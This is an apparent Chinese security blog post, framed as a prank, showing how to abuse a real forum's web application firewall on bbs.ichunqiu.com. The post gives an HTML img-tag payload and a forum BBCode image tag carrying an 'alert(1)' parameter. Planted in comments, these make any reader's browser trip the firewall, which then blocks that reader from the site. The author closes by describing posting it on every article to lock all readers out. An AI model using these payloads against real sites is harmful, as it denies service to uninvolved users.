@1kbfree 2018-09-25T17:44:21.000000Z 字数 1192 阅读 2044

一个有趣的恶作剧

漏洞挖掘

首先，正常打开I春秋页面（https://bbs.ichunqiu.com/portal.php）

image_1co8pc6j2lsosoc5deimp119l9.png-488kB

然后手贱一下加上一个alert(1)试试~（https://bbs.ichunqiu.com/portal.php?a=alert(1)）

image_1co8pe8r41j8u13va2nqeo4tlsm.png-80kB

尝试利用

我去=v=。这个WAF（加速乐）很强，这都给拦了，但是作为一个捡漏洞的人来讲，要别人交互的漏洞都是低位和不收的，而且这个是要用户打开链接才可以被拦截，但是等下就会正常显示，那用户点击后发现会显示这个页面不可能再次点击把~，那么就应该想想如何提升危害，然后我发现了有个好玩的~

构造代码

首先我在本地尝试一下，创建一个HTML文件，代码是

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>拦截吧（你打不开i春秋了）</title>
</head>
<body>
    <img src="https://bbs.ichunqiu.com/portal.php?a=alert(1)" alt="">
</body>
</html>

然后在浏览器处打开

image_1co8pnjs3hpu61e2qu178avuq13.png-13.8kB

然后再尝试打开I春秋

image_1co8ppa5ldmeg3r1b2ria5128h1g.png-74.1kB

我来解释一下为啥子~因为img标签设置的src属性是https://bbs.ichunqiu.com/portal.php?a=alert(1)，所以打开页面会加载https://bbs.ichunqiu.com/portal.php?a=alert(1)这个URL，然后我们访问这个URL的话会被WAF拦截，导致无法访问I春秋

BUG利用

我们可以看到I春秋回复处可以加载图片，如下（随便打开一个文章：https://bbs.ichunqiu.com/thread-46084-1-1.html）

image_1co8rbua7oeq4qj6kmte5vvm6r.png-111.5kB

image_1co8rd4ln1s3uj5ubud1st01gij78.png-149.4kB

上传的图片是：https://bbs.ichunqiu.com/uc_server/avatar.php?uid=340720&size=middle

那么我想让别人访问这个文章就显示WAF拦截页面如何搞？嘿嘿，可以在链接后面加个&a=alert(1)，变成https://bbs.ichunqiu.com/uc_server/avatar.php?uid=340720&size=middle&a=alert(1)

注意：先发一条评论然后点击编辑然后插入这段代码

[img=120,120]https://bbs.ichunqiu.com/uc_server/avatar.php?uid=340720&size=middle&a=alert(1)[/img]

如下

image_1co8rja781h0o9q282f11lva7l82.png-103.1kB

然后再次访问 https://bbs.ichunqiu.com/thread-46084-1-1.html

image_1co8rlknh1bi6i131rafr51nbf8f.png-100.1kB

可以看到加载了，那么刷新一下~

image_1co8rm7751lfi16hb10e31151rae8s.png-81.3kB

那么，我如果想恶意破坏的话，我可以在每个文章那里加上这个代码（评论），导致每个看文章的人无法正常访问I春秋~~

一个有趣的恶作剧

尝试利用

构造代码

BUG利用

内容目录